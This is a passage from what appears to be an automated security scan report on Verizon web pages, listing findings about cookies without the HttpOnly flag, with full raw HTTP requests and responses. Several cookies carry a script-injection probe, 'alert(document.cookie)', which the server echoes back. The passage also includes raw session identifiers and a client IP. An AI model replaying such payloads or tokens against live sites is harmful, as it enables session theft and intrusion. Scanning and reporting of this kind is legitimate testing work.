Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230544
Expires: Mon, 05 Sep 2011 22:39:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:39:57 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:39:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...

10.137. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Ver
...[SNIP]...

10.138. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>


...[SNIP]...

10.139. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 31774
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Verizon | Shop for Services | TV + Internet + Phone</title>
   <meta na
...[SNIP]...

10.140. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 0
Expires: Mon, 05 Sep 2011 22:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:42:02 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com


10.141. https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/VZRepair/vziha/Service.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/fiostv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; CP=null*; 
refURL=http://www22.verizon.com/residentialhelp/fiostv; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 324213
Expires: Mon, 05 Sep 2011 22:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:39 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; path=/; secure
Set-Cookie: vzinhomeagent=AccountIDAuthMode=bgBvAA==&GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADQAMAAxADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&IsFoundAck=ZgBhAGwAcwBlAA==&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A; path=/; secure


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Verizon | Resi
...[SNIP]...

10.142. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

